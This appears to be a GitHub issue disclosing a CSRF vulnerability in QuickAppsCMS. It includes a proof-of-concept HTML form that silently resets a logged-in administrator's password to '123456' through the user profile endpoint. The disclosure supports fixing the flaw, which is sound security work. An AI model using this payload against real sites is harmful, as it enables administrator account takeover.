CSRF issue that allows attacker to change the administrator password

- There is a CSRF  vulnerability  has been found in the quickappscms,which can change administrator's password.
- After the administrator login in ,open this html page:
- POC:

```
<html>
  
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.quickappscms.org/en_US/user/me" method="POST">
      <input type="hidden" name="&#95;method" value="PUT" />
      <input type="hidden" name="name" value="demo" />
      <input type="hidden" name="email" value="info&#64;quickappscms&#46;org" />
      <input type="hidden" name="public&#95;email" value="0" />
      <input type="hidden" name="public&#95;profile" value="0" />
      <input type="hidden" name="web" value="" />
      <input type="hidden" name="locale" value="" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="password2" value="123456" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

```

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

CSRF issue that allows attacker to change the administrator password #199

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

CSRF issue that allows attacker to change the administrator password #199

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions